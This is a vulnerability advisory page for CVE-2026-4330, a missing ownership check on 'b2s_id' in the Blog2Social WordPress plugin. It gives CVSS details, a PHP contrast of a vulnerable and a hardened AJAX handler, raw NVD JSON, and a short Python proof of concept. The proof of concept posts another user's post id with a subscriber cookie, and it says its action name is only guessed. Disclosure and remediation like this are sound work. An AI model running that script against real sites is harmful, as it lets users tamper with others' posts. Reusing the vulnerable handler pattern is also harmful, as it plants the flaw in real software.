Security Vulnerability Report
CVE-2026-4330 CVSS 4.3 MEDIUM

Published: 2026-04-08 08:16:24
Last Modified: 2026-04-24 18:15:29

Description

The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to authorization bypass through user-controlled key in all versions up to, and including, 8.8.3. This is due to the plugin's AJAX handlers failing to validate that the user-supplied 'b2s_id' parameter belongs to the current user before performing UPDATE and DELETE operations. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify, reschedule, or delete other users' scheduled social media posts.
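The following is an added illustration of the defect class the advisory describes (CWE-639, a user-controlled row key accepted without an ownership check) in a WordPress AJAX handler, shown beside a hardened form. It is not Blog2Social's code: the table, column, nonce and action names are hypothetical; only the `b2s_id` parameter name is taken from the advisory.

```php
<?php
// Hypothetical handler illustrating the pattern behind the advisory.
// Table/column/action names are made up; not the plugin's real code.

// --- Vulnerable pattern: checks login and nonce, never ownership ---
function example_ajax_update_post_vulnerable() {
    check_ajax_referer( 'example_nonce', 'nonce' );      // CSRF protection only
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'auth required', 401 );       // wp_send_json_* ends the request
    }
    global $wpdb;
    $id   = isset( $_POST['b2s_id'] ) ? (int) $_POST['b2s_id'] : 0;
    $when = isset( $_POST['sched_date'] ) ? sanitize_text_field( wp_unslash( $_POST['sched_date'] ) ) : '';

    // Row is selected by the caller-supplied id alone: any logged-in user
    // (Subscriber and above) can pass another user's id and reschedule their post.
    $wpdb->update( $wpdb->prefix . 'example_posts', array( 'sched_date' => $when ), array( 'id' => $id ) );
    wp_send_json_success();
}

// --- Hardened pattern: the current user becomes part of the row lookup ---
function example_ajax_update_post_fixed() {
    check_ajax_referer( 'example_nonce', 'nonce' );
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'auth required', 401 );
    }
    global $wpdb;
    $id      = isset( $_POST['b2s_id'] ) ? absint( $_POST['b2s_id'] ) : 0;
    $when    = isset( $_POST['sched_date'] ) ? sanitize_text_field( wp_unslash( $_POST['sched_date'] ) ) : '';
    $user_id = get_current_user_id();
    $table   = $wpdb->prefix . 'example_posts';

    // 1. Verify the row belongs to the caller before doing anything with it.
    $owner = $wpdb->get_var( $wpdb->prepare( "SELECT user_id FROM {$table} WHERE id = %d", $id ) );
    if ( null === $owner || (int) $owner !== $user_id ) {
        wp_send_json_error( 'not your post', 403 );       // same answer for missing and foreign rows
    }

    // 2. Scope the UPDATE itself by owner as well, so the WHERE clause enforces
    //    the check even if the row changes hands between the SELECT and the UPDATE.
    $rows = $wpdb->update( $table, array( 'sched_date' => $when ), array( 'id' => $id, 'user_id' => $user_id ) );
    if ( false === $rows || 0 === $rows ) {
        wp_send_json_error( 'nothing updated', 403 );
    }
    wp_send_json_success();
}

// Only the hardened handler is registered; the vulnerable one is shown for contrast.
add_action( 'wp_ajax_example_update_post', 'example_ajax_update_post_fixed' );
```

The same owner-scoped WHERE clause applies to the DELETE path the advisory mentions; a handler that deletes by `id` alone has the same defect.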

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

Blog2Social <= 8.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
attacker_cookie = "wordpress_logged_in_xxx=..."

# The vulnerable parameter 'b2s_id' belonging to another user
target_post_id = "12345"

# Simulate the vulnerable AJAX action
# (Action name might vary based on specific functionality)
data = {
    "action": "b2s_update_post",  # Example action, derived from context
    "b2s_id": target_post_id,
    "b2s_modify_data": "MALICIOUS_CONTENT",
}
headers = {
    "Cookie": attacker_cookie,
    "Content-Type": "application/x-www-form-urlencoded",
}

response = requests.post(target_url, data=data, headers=headers)
if response.status_code == 200:
    print("[+] Exploit successful! Post modified.")
else:
    print("[-] Failed")
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-4330", "sourceIdentifier": "[email protected]", "published": "2026-04-08T08:16:23.733", "lastModified": "2026-04-24T18:15:28.940", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to authorization bypass through user-controlled key in all versions up to, and including, 8.8.3. This is due to the plugin's AJAX handlers failing to validate that the user-supplied 'b2s_id' parameter belongs to the current user before performing UPDATE and DELETE operations. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify, reschedule, or delete other users' scheduled social media posts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Ajax/Post.php#L2178", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Ajax/Post.php#L2183", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Ajax/Post.php#L2273", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Ajax/Post.php#L2322", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/B2S/Post/Tools.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/B2S/Ship/Save.php#L190", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Loader.php#L2202", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php#L2178", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php#L2183", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php#L2273", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php#L2322", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/B2S/Post/Tools.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/B2S/Ship/Save.php#L190", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Loader.php#L2202", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3494550/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3eec9c6-fef9-4d6e-8328-51efb997c99c?source=cve", "source": "[email protected]"}]}}
```